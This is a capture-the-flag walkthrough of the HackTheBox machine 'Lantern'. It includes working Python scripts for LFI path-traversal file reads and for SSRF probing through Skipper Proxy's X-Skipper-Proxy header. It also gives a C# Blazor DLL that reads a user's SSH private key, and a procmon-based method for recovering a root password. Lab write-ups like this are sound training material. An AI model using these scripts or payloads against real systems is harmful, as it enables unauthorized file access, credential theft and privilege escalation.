# Lantern

<figure><img src="/files/ybobigxSpB9UBiZq9VWJ" alt=""><figcaption></figcaption></figure>

## Enumeration

Starting with rustscan, I see port 3000 open (a login page), port 80 (the default web page) and port 22 (SSH). We can poke at each of these services while waiting for the deeper nmap scan to finish.

Result from nmap:

```
 nmap -A -T4 -sC -sV -p- 10.10.11.29
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 09:22 +07
Warning: 10.10.11.29 giving up on port because retransmission cap hit (6).
Stats: 0:07:20 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 49.62% done; ETC: 09:36 (0:07:27 remaining)
Stats: 0:07:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 49.63% done; ETC: 09:36 (0:07:27 remaining)
Stats: 0:11:53 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 70.73% done; ETC: 09:38 (0:04:55 remaining)
Stats: 0:16:19 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 93.34% done; ETC: 09:39 (0:01:10 remaining)
Stats: 0:18:15 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 09:40 (0:00:22 remaining)                                                                                                  
Nmap scan report for lantern.htb (10.10.11.29)                                                                                                                          
Host is up (0.060s latency).                                                                                                                                            
Not shown: 65132 closed tcp ports (conn-refused), 401 filtered tcp ports (no-response)                                                                                  
PORT   STATE SERVICE VERSION                                                                                                                                            
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)                                                                                      
| ssh-hostkey:                                                                                                                                                          
|   256 80:c9:47:d5:89:f8:50:83:02:5e:fe:53:30:ac:2d:0e (ECDSA)                                                                                                         
|_  256 d4:22:cf:fe:b1:00:cb:eb:6d:dc:b2:b4:64:6b:9d:89 (ED25519)                                                                                                       
80/tcp open  http    Skipper Proxy                                                                                                                                      
|_http-server-header: Skipper Proxy                                                                                                                                     
|_http-title: Lantern                                                                                                                                                   
| fingerprint-strings:                                                                                                                                                  
|   FourOhFourRequest:                                                                                                                                                  
|     HTTP/1.0 404 Not Found                                                                                                                                            
|     Content-Length: 207                                                                                                                                               
|     Content-Type: text/html; charset=utf-8                                                                                                                            
|     Date: Sun, 18 Aug 2024 02:30:57 GMT                                                                                                                               
|     Server: Skipper Proxy                                                                                                                                             
|     <!doctype html>                                                                                                                                                   
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Content-Length: 225
|     Content-Type: text/html; charset=utf-8
|     Date: Sun, 18 Aug 2024 02:30:51 GMT
|     Location: http://lantern.htb/
|     Server: Skipper Proxy
|     <!doctype html>
|     <html lang=en>
|     <title>Redirecting...</title>
|     <h1>Redirecting...</h1>
|     <p>You should be redirected automatically to the target URL: <a href="http://lantern.htb/">http://lantern.htb/</a>. If not, click the link.
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|     Content-Type: text/html; charset=utf-8
|     Date: Sun, 18 Aug 2024 02:30:51 GMT
|_    Server: Skipper Proxy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=8/18%Time=66C15F08%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,18F,"HTTP/1\.0\x20302\x20Found\r\nContent-Length:\x20225\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Sun,\x2018\x20A
SF:ug\x202024\x2002:30:51\x20GMT\r\nLocation:\x20http://lantern\.htb/\r\nS
SF:erver:\x20Skipper\x20Proxy\r\n\r\n<!doctype\x20html>\n<html\x20lang=en>
SF:\n<title>Redirecting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\
SF:x20should\x20be\x20redirected\x20automatically\x20to\x20the\x20target\x
SF:20URL:\x20<a\x20href=\"http://lantern\.htb/\">http://lantern\.htb/</a>\
SF:.\x20If\x20not,\x20click\x20the\x20link\.\n")%r(HTTPOptions,A5,"HTTP/1\
SF:.0\x20200\x20OK\r\nAllow:\x20GET,\x20OPTIONS,\x20HEAD\r\nContent-Length
SF::\x200\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Sun,
SF:\x2018\x20Aug\x202024\x2002:30:51\x20GMT\r\nServer:\x20Skipper\x20Proxy
SF:\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request")%r(FourOhFourRequest,162,"HTTP/1\.0\x20404\x20
SF:Not\x20Found\r\nContent-Length:\x20207\r\nContent-Type:\x20text/html;\x
SF:20charset=utf-8\r\nDate:\x20Sun,\x2018\x20Aug\x202024\x2002:30:57\x20GM
SF:T\r\nServer:\x20Skipper\x20Proxy\r\n\r\n<!doctype\x20html>\n<html\x20la
SF:ng=en>\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\n<p>T
SF:he\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20server\.\
SF:x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20check\x2
SF:0your\x20spelling\x20and\x20try\x20again\.</p>\n")%r(GenericLines,67,"H
SF:TTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20ch
SF:arset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(He
SF:lp,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plai
SF:n;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reques
SF:t")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x20400\x20Bad
SF:\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnect
SF:ion:\x20close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1166.77 seconds
```

Browsing to the web server shows in the response headers that it sits behind Skipper Proxy, and the front end is a Blazor application. Skipper Proxy is the component with a known SSRF vulnerability.

Exploit-DB has a write-up of this vulnerability: <https://www.exploit-db.com/exploits/51111>

The bug: an unauthenticated client can make the proxy fetch an arbitrary URL simply by adding a specific header (X-Skipper-Proxy) to the HTTP request; the proxy forwards the request to whatever address that header names.

Enumeration of the web content also turns up an endpoint with an LFI vulnerability, which should give us plenty of sensitive data for later testing.

## LFI

```
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/combined_directories.txt -u http://lantern.htb/FUZZ -t 100
```

This wordlist only turned up the `PrivacyAndPolicy` endpoint. To get further, fuzz its parameters with LFI wordlists in Burp Suite.

Discovered: <http://lantern.htb/PrivacyAndPolicy?lang=../../../../etc/host&ext=conf> (the application appears to build the file name as `<lang>.<ext>`, so this request reads `/etc/host.conf`).

Fuzzing this endpoint takes at least 30 minutes.

<figure><img src="/files/gU4P81TuMkm7BmsBwQ6D" alt=""><figcaption></figcaption></figure>

Keep pulling files this way and you get the contents of app.py and a few other interesting files.
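A small helper for pulling files through this endpoint, added here as an example and not part of the original notes. It assumes the application builds the file name as `<lang>.<ext>` (inferred from the `/etc/host` + `conf` probe above) and that four `../` are enough to reach the filesystem root; `ENDPOINT`, the function names and the handling of files without an extension are my assumptions.

```python
"""Fetch arbitrary files via the PrivacyAndPolicy lang/ext parameters.

Added example (not the write-up's tooling). Assumes the endpoint joins the two
parameters as "<lang>.<ext>", which is why /etc/host.conf was read with
lang=../../../../etc/host&ext=conf.
"""
import urllib.error
import urllib.request
from urllib.parse import urlencode

ENDPOINT = "http://lantern.htb/PrivacyAndPolicy"  # assumed base, from the probe above


def lfi_params(path: str, depth: int = 4) -> dict:
    """Split an absolute path into the lang/ext pair the endpoint expects.

    Only the basename is split on '.', so /home/tomas/.ssh/id_rsa is not
    mangled by the dot in '.ssh'. Files without an extension get ext="",
    which only works if the server tolerates a trailing dot (assumption).
    """
    if not path.startswith("/"):
        raise ValueError("expected an absolute path")
    directory, _, name = path.lstrip("/").rpartition("/")
    stem, dot, ext = name.rpartition(".")
    if not dot or not stem:  # "id_rsa" has no dot; ".bashrc" has only a leading one
        stem, ext = name, ""
    lang = "../" * depth + (directory + "/" if directory else "") + stem
    return {"lang": lang, "ext": ext}


def build_url(path: str, depth: int = 4) -> str:
    """Full request URL; '/' is kept literal so the traversal stays readable."""
    return ENDPOINT + "?" + urlencode(lfi_params(path, depth), safe="/")


def fetch(path: str, timeout: float = 10.0):
    """GET the file; None when the server answers with an error (missing/unreadable)."""
    try:
        with urllib.request.urlopen(build_url(path), timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except (urllib.error.HTTPError, urllib.error.URLError):
        return None


if __name__ == "__main__":
    # Files worth pulling first on a Linux box running a Python app behind a proxy.
    for candidate in ("/etc/passwd", "/etc/host.conf", "/proc/self/cmdline"):
        body = fetch(candidate)
        shown = "no reply" if body is None else repr(body[:80])
        print(f"{candidate}: {shown}")
```

Run it against the box (with `lantern.htb` in `/etc/hosts`) and extend the candidate list with whatever app.py references; `build_url` alone is handy for pasting into Burp.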

<figure><img src="/files/lx2ghjbJMPtJP1dHsaKv" alt=""><figcaption><p>Notice that port 8000 seems reachable; let's test more default service ports</p></figcaption></figure>

## SSRF

Ports 3000, 8000 and 5000 are commonly used by web applications or local services on a server. To test for SSRF through Skipper Proxy, send a request with an `X-Skipper-Proxy` header pointing at <http://127.0.0.1:5000/> and see whether the proxy will fetch a service that is bound to localhost.

Such a service is normally not exposed to the Internet and is only reachable from the host itself. If the proxy honours the header, an attacker can use it to reach internal services that are otherwise inaccessible from outside.

Port 5000 is the default port for Flask (a Python microframework) and similar services, so it is a good first candidate.

If the request comes back with a response from port 5000 rather than the public site, the proxy can be abused to reach the internal service, and the SSRF vulnerability is confirmed.
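The probe described above, written out as a small script. This is an added example and not the write-up's own code: it sends one request per candidate port with `X-Skipper-Proxy: http://127.0.0.1:<port>/`, compares each reply with an unproxied baseline, and treats a 502/503/504 as "the proxy tried but nothing is listening". The function names, `CANDIDATE_PORTS` and the three-way classification are my assumptions; the `Host` value comes from the nmap redirect.

```python
"""Probe localhost ports through Skipper Proxy's X-Skipper-Proxy header.

Added example, not code from the original write-up. One request per port is
sent to the public site with the header set to http://127.0.0.1:<port>/; the
reply is compared with an unproxied baseline request to decide whether an
internal service answered.
"""
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Optional

CANDIDATE_PORTS = (3000, 5000, 8000)   # common local web/app ports (from the write-up)
VHOST = "lantern.htb"                  # the Host the proxy redirects to (nmap output)


@dataclass(frozen=True)
class Reply:
    """The parts of a reply we compare; a hypothetical helper type."""
    status: int
    server: str
    length: int


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow the 302 to http://lantern.htb/; we want the raw reply."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = urllib.request.build_opener(_NoRedirect)


def build_probe(base_url: str, port: Optional[int]) -> urllib.request.Request:
    """GET base_url; with a port, ask the proxy to fetch http://127.0.0.1:<port>/ instead."""
    req = urllib.request.Request(base_url, method="GET")
    req.add_header("Host", VHOST)
    if port is not None:
        req.add_header("X-Skipper-Proxy", f"http://127.0.0.1:{port}/")
    return req


def send(req: urllib.request.Request, timeout: float = 5.0) -> Reply:
    """Issue the request; 3xx/4xx/5xx are real replies too, so keep them."""
    try:
        with _OPENER.open(req, timeout=timeout) as resp:
            return Reply(resp.status, resp.headers.get("Server", ""), len(resp.read()))
    except urllib.error.HTTPError as err:
        return Reply(err.code, err.headers.get("Server", ""), len(err.read()))


def classify(baseline: Reply, probe: Reply) -> str:
    """closed: proxy honoured the header but nothing listened; reached: something
    else answered; unchanged: header ignored (or the same app on that port)."""
    if probe.status in (502, 503, 504):
        return "closed"
    if (probe.status, probe.length) == (baseline.status, baseline.length):
        return "unchanged"
    return "reached"


def probe_ports(base_url: str, ports=CANDIDATE_PORTS) -> dict:
    """Map each port to its classification against the unproxied baseline."""
    baseline = send(build_probe(base_url, None))
    return {p: classify(baseline, send(build_probe(base_url, p))) for p in ports}


if __name__ == "__main__":
    for port, verdict in probe_ports("http://10.10.11.29/").items():
        print(f"127.0.0.1:{port} -> {verdict}")
```

A "reached" verdict is only a hint that something different answered; confirm it by looking at the body in Burp, since the Server header is set by Skipper itself and does not change.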

## Note

* The `_framework` directory is specific to certain web application frameworks, particularly **Blazor** applications in ASP.NET Core, so that is where to look next.
* **Blazor**: `_framework` is a directory commonly seen in Blazor applications, which are part of the ASP.NET Core framework developed by Microsoft. Blazor allows developers to build interactive web applications using C# instead of JavaScript.
* When scanning the `/_framework/` directory of a Blazor or ASP.NET Core application, it makes sense to focus on the `.dll` file extension.

Unfortunately none of my wordlists found the right .dll there.

From the LFI I found `/_framework/InternaLantern.dll`. Download it and analyze it with dotPeek or ILSpy. Remember to add the X-Skipper-Proxy header: do it in Burp Suite, add `X-Skipper-Proxy` pointing at localhost on port 5000 (the port found in the testing above), forward the request and the file comes back.

<figure><img src="/files/MDtPWKSht3Tt3ZjnkyB8" alt=""><figcaption><p>switch to the Proxy tab and forward to get the file</p></figcaption></figure>

dotPeek makes analysing a .NET assembly much easier:

<figure><img src="/files/HnG28HUP35WGBNnUH1qO" alt=""><figcaption><p>got the admin password for the login on port 3000 by base64-decoding it</p></figcaption></figure>

On port 3000 we can log in as admin with that password:

<figure><img src="/files/AR1j2655l6yAaVtWAYGu" alt=""><figcaption></figcaption></figure>

## User

In the upload content module we need to change the upload path to /opt/components/; by default it uploads to "Upload directory /var/www/sites/lantern.htb/static/images", as in the screenshot above.

A Burp Suite extension, BTP (Blazor Traffic Processor), helps with this: <https://portswigger.net/bappstore/8a87b0d9654944ccbdf6ae8bdd18e1d4>

Download it from the link or install it from within Burp Suite:

<figure><img src="/files/2E3wde2q0TgzmEHMxnh2" alt=""><figcaption></figcaption></figure>

The menu after a successful install:

<figure><img src="/files/ArG5TV6SvzrqUsIirpCt" alt=""><figcaption></figcaption></figure>

The server framework is .NET, so upload a DLL and trigger it through the file upload vulnerability:

First build the .dll for the exploit. A reverse shell would work too; for brevity I will just read the SSH key (the box has one):

```
using Microsoft.AspNetCore.Components;
using Microsoft.AspNetCore.Components.Rendering;
using System.IO;

namespace exploit
{
    public class Component : ComponentBase
    {
        protected override void BuildRenderTree(RenderTreeBuilder builder)
        {
            base.BuildRenderTree(builder);

            // Read the content of the sensitive file
            string file = File.ReadAllText("/home/tomas/.ssh/id_rsa");

            // Add the content to the render tree
            builder.AddContent(0, file);
        }
    }
}

```

Why tomas? It came from tracing around the server with the LFI; I also found a mail message from tomas that will help with root later (var/tomas/mails).

Build it step by step:

1. **Create a new class library:**

Open your terminal and run the following command to create a new class library project:

```
dotnet new classlib -n exploit

```

This creates a new directory named `exploit` with the basic files for a class library project.

2. **Navigate to the project directory:**

Change to the newly created `exploit` directory:

```
cd exploit
```

3. **Add the necessary package:**

Add the required package for Blazor components:

```
dotnet add package Microsoft.AspNetCore.Components --version 6.0.0

```

This command adds the `Microsoft.AspNetCore.Components` package to your project, which is necessary for creating the Blazor component.

4. **Modify the `Class1.cs` file:**

Open `Class1.cs` in a text editor, replace its contents with the code given above, and save the file.

5. **Build the project:**

Now, build the project in Release mode:

```
dotnet build -c Release

```

This command compiles the code and generates the `exploit.dll` file in the `bin/Release/net6.0/` directory.

That gives us the DLL; now upload it to the server.

<figure><img src="/files/4nmMgqQAHIZDfhlZjOZG" alt=""><figcaption></figcaption></figure>

Upload the file and send the request to the BTP tab.

Deserialize the input, change the value of the name field to the path found during the LFI recon, then copy it and convert from JSON -> Blazor.

<figure><img src="/files/t6SBdU0htDq7ZEeUwSu5" alt=""><figcaption><p>the name field is what we need here</p></figcaption></figure>

<figure><img src="/files/FbTuAxZkjZD9V7ZMVTQU" alt=""><figcaption></figcaption></figure>

Serialize it:

<figure><img src="/files/oHm9hX2NkNyVh4qYtWcu" alt=""><figcaption></figcaption></figure>

Copy it and overwrite the request body in the Proxy tab:

<figure><img src="/files/FuplsgPltpUSidhnI6GU" alt=""><figcaption></figcaption></figure>

Output when successful:

<figure><img src="/files/ZK61DnuXCy34lhrXgC63" alt=""><figcaption></figcaption></figure>

Search for this module (the uploaded file name is the module name to search for) and you get the id_rsa key:

<figure><img src="/files/pzuxIgEurm92tE8zxe8j" alt=""><figcaption></figcaption></figure>

Now copy the id_rsa key, set its permissions to 600, and connect over SSH to get the user flag as tomas.

## Root

`sudo -l` gives a first look:

<figure><img src="/files/EIixH8EW2br57GoDV87c" alt=""><figcaption></figcaption></figure>

We see `(ALL : ALL) NOPASSWD: /usr/bin/procmon`, so procmon can be run with sudo. Check the running processes now:

<figure><img src="/files/WW2dBqSkuJ1RX52PhwI5" alt=""><figcaption></figcaption></figure>

ps: displays information about running processes.

-a: selects all processes associated with a terminal, except session leaders (together with -e this is just the usual "show everything" idiom).

-e: selects every process on the system.

-f: full-format listing, including UID (user ID), PID (process ID), PPID (parent process ID), start time and the full command line.

<figure><img src="/files/YTupSDB57VGSQJDY7c08" alt=""><figcaption></figcaption></figure>

```
sudo /usr/bin/procmon -p pid_of_process_in_picture -e write
```

Wait a few minutes and press F6; procmon exports a .db file into the current directory. Transfer it to the attack machine and open it there.

<figure><img src="/files/oa5FXbZA1ANp0qI6BUx8" alt=""><figcaption><p>I renamed the file to make the transfer easier</p></figcaption></figure>

Transfer it to the attack machine:

<figure><img src="/files/QFnpfH8YzpL6XQXCgnoa" alt=""><figcaption></figcaption></figure>

Open it with sqlite3 to grab some information:

<figure><img src="/files/Q9yt3VGcWajSeW5mnHkc" alt=""><figcaption></figcaption></figure>

From here, look around all the tables and the data in them. To make it easier I focus on resultcode, which is the value returned by the traced system call.

<figure><img src="/files/T5i1sKq1i3qg1wqWRIE6" alt=""><figcaption></figcaption></figure>

There are a lot of commands in here, so it takes some tracing. I dump the extracted data into another file for analysis with this SQL query:

```
-- For every write() that returned more than 0 bytes, pull the written buffer
-- out of the raw argument blob (skipping its first 8 bytes) and hex-encode it.
SELECT hex(substr(arguments, 9, resultcode))
FROM ebpf
WHERE resultcode > 0
ORDER BY timestamp;
```

Decode it from hex (I hex-encode everything the query extracts because hex copies cleanly; raw bytes would get mangled):

<figure><img src="/files/C5exnzGe4BjaDs9BSJ9v" alt=""><figcaption></figcaption></figure>

Download the decoded output from CyberChef; you will see commands like `echo Q 33EEddddttddww33ppMMB`

Remove the duplicates and you have the root password:
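The same extraction done in Python, so it can be repeated against a fresh export without CyberChef. This is an added example, not part of the original notes. It assumes the exported SQLite file has an `ebpf` table with `timestamp`, `arguments` (raw syscall arguments as a BLOB) and `resultcode` columns, and that the write() buffer begins at byte 9 of `arguments` and spans `resultcode` bytes, exactly as the query above does; the sample database is constructed with placeholder values, not data from the box.

```python
"""Recover write() buffers from a procmon (Process Monitor for Linux) SQLite export.

Added example, not from the write-up. Same assumptions as the SQL above: table
`ebpf`, raw arguments in a BLOB column, written bytes starting at byte 9 and
spanning `resultcode` bytes (the syscall's return value).
"""
import sqlite3
from typing import List

# Identical to the query in the write-up; hex() survives copy/paste where raw bytes would not.
RECOVER_SQL = """
SELECT hex(substr(arguments, 9, resultcode))
FROM ebpf
WHERE resultcode > 0
ORDER BY timestamp
"""


def recover_writes(conn: sqlite3.Connection) -> List[str]:
    """Every successful write()'s buffer as text, in capture order."""
    return [
        bytes.fromhex(hexblob).decode("utf-8", errors="replace")
        for (hexblob,) in conn.execute(RECOVER_SQL)
    ]


def dedupe(items: List[str]) -> List[str]:
    """Drop repeats while keeping first-seen order (the 'remove duplicate' step)."""
    seen = set()
    out = []
    for item in items:
        if item not in seen:
            seen.add(item)
            out.append(item)
    return out


def recover_from_file(db_path: str) -> List[str]:
    """Open the exported .db and return the unique written buffers."""
    conn = sqlite3.connect(db_path)
    try:
        return dedupe(recover_writes(conn))
    finally:
        conn.close()


def build_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for the export; the 'password' is a placeholder."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ebpf (timestamp INTEGER, arguments BLOB, resultcode INTEGER)")
    fd = (1).to_bytes(8, "little")  # 8 bytes ahead of the buffer, skipped by substr(..., 9, ...)
    bufs = [b"whoami\n", b"echo Placeholder-Passw0rd\n", b"echo Placeholder-Passw0rd\n"]
    rows = [(i, fd + buf, len(buf)) for i, buf in enumerate(bufs, start=1)]
    rows.append((len(rows) + 1, fd + b"\x00" * 16, -11))  # failed write (negative errno): filtered out
    conn.executemany("INSERT INTO ebpf VALUES (?, ?, ?)", rows)
    return conn


if __name__ == "__main__":
    for line in dedupe(recover_writes(build_sample_db())):
        print(repr(line))
```

Point `recover_from_file` at the transferred .db to get the unique command lines straight away; if the export captured writes per keystroke, expect fragments that you still have to read in order.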

<figure><img src="/files/U5NlJChGXBU2Scl6VRWz" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/mYetmObzpQdQymT4Yzh2" alt=""><figcaption></figcaption></figure>


